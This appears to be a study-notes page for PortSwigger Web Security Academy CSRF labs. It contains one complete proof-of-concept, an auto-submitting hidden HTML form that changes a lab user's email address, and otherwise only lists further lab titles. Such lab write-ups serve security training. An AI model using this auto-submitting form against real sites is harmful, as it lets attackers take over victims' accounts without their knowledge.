Cross-site request forgery (CSRF)
https://portswigger.net/web-security/csrf
Lab: CSRF vulnerability with no defenses
Body:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://acd71f561e07ef5fc0553244005800ca.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="test@test.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>Lab: CSRF where token validation depends on request method
Lab: CSRF where token validation depends on token being present
Lab: CSRF where token is not tied to user session
Lab: CSRF where token is tied to non-session cookie
Lab: CSRF where token is duplicated in cookie
Lab: CSRF where Referer validation depends on header being present
Lab: CSRF with broken Referer validation
Last updated